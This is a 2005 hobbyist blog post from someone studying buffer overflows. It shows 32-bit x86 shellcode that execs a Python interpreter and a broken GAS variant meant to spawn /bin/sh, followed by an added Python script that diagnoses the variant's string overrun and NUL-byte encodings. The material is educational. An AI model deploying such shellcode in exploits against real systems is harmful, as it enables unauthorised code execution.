Saturday, January 22, 2005

pyshellcode

For want of a better name for a shellcode that launches a python shell :)


Been researching into buffer overflows and vulnerabilities et al.

Being a hardcore python fanatic, I just had to try the following shellcode. I must say thanks to all the people with tutorials and materials over the web that I’ve read over and over again. Thank you GNU, thank you OpenSource, thank you Linux.


/*Begin Assembly Routine*/

BITS 32

xor eax,eax            ; eax = 0 without putting a NUL byte in the encoding
jmp short string       ; forward to the call, so the string's address ends up on the stack

start:
pop esi                ; esi = address of the string pushed by "call start"
mov byte [esi+15],al   ; "/usr/bin/python" is 15 chars: overwrite the '$' with a 0 terminator
mov [esi+16],esi       ; overwrite "XXXX" with the string's address -> argv[0]
mov [esi+20],eax       ; overwrite "NULL" with 0 -> argv[1] (also serves as an empty envp)
mov byte al,0x0b       ; syscall 11 = execve
mov ebx,esi            ; ebx = filename
lea ecx,[esi+16]       ; ecx = argv
lea edx,[esi+20]       ; edx = envp
int 0x80
xor eax,eax            ; only reached if execve fails
xor ebx,ebx
mov byte al,0x01       ; syscall 1 = exit(0)
int 0x80

string:
call start
db '/usr/bin/python$XXXXNULL'

/*End Assembly Routine*/

Trying to use GAS, I ran into problems I can’t explain tho :(

/*Begin problematic routine shellcode*/

jmp dummy
start:
popl %esi
xor %eax,%eax
movb %al,7(%esi)
movl %esi,8(%esi)
movl %eax,12(%esi)
movb $0xb,%al
movl %esi,%ebx
leal 8(%esi),%ecx
leal 12(%esi),%edx
int $0x80
xor %eax,%eax
xor %ebx,%ebx
movl $0x01,%eax
int $0x80
dummy:
call start
.ascii "/bin/sh"

/*End problematic routine shellcode*/

Dunno what I’m doing wrong in the problematic routine. Anyone any ideas?
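A layout check for the two listings above, added here as an editor's example rather than the post's own code: it parses the esi-relative stores, the 32-bit immediate loads and the embedded string from a listing in either syntax, then reports how many bytes the stores reach past the data and which immediates assemble with zero bytes. On the GAS routine it finds that the stores reach 16 bytes while `.ascii "/bin/sh"` supplies 7 (the NASM routine pads with `$XXXXNULL` to 24), and that `movl $0x01,%eax` encodes NULs where the NASM routine uses the 8-bit `mov byte al,0x01`. The embedded listing is a copy of the GAS routine with the labels and jumps left out, since the check ignores them.

```python
import re

# Constructed copy of the post's GAS routine with the labels and jumps (which the check ignores) left out.
GAS_LISTING = """
popl %esi
xor %eax,%eax
movb %al,7(%esi)
movl %esi,8(%esi)
movl %eax,12(%esi)
movb $0xb,%al
movl %esi,%ebx
leal 8(%esi),%ecx
leal 12(%esi),%edx
int $0x80
xor %eax,%eax
xor %ebx,%ebx
movl $0x01,%eax
int $0x80
call start
.ascii "/bin/sh"
"""

# esi-relative stores, 32-bit immediate loads and the embedded string, in AT&T and NASM syntax.
STORE_ATT = re.compile(r"mov([bl])\s+%\w+,\s*(\d+)\(%esi\)")      # movb %al,7(%esi)
STORE_NASM = re.compile(r"mov\s+(byte)?\s*\[esi\+(\d+)\],")       # mov byte [esi+15],al
IMM_ATT = re.compile(r"movl\s+\$(0x[0-9a-f]+|\d+),\s*%e")         # movl $0x01,%eax
IMM_NASM = re.compile(r"mov\s+e[a-z]{2},\s*(0x[0-9a-f]+|\d+)$")   # mov eax,0x01
DATA = re.compile(r"""(?:\.ascii|db)\s+(['"])(.*)\1""")             # .ascii "/bin/sh" or db '...'

def check_layout(listing: str) -> dict:
    """Bytes the stores touch vs. bytes of data present, plus immediates that assemble with NULs."""
    data_len, need, nul_imms = 0, 0, []
    for line in listing.splitlines():
        line = line.strip().lower()
        store = STORE_ATT.match(line) or STORE_NASM.match(line)
        imm = IMM_ATT.match(line) or IMM_NASM.match(line)
        if store:  # a 1- or 4-byte write at esi+offset; track the highest byte any store reaches
            width = 1 if store.group(1) in ("b", "byte") else 4
            need = max(need, int(store.group(2)) + width)
        elif imm:  # an imm32 below 0x01000000 is little-endian encoded with a 0x00 high byte
            if int(imm.group(1), 16 if imm.group(1).startswith("0x") else 10) < 0x01000000:
                nul_imms.append(line)
        elif DATA.match(line):
            data_len = len(DATA.match(line).group(2))
    return {"data_len": data_len, "bytes_needed": need,
            "overrun": max(0, need - data_len), "nul_immediates": nul_imms}

print(check_layout(GAS_LISTING))  # overrun 9: the stores need 16 bytes of data but only 7 follow
```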
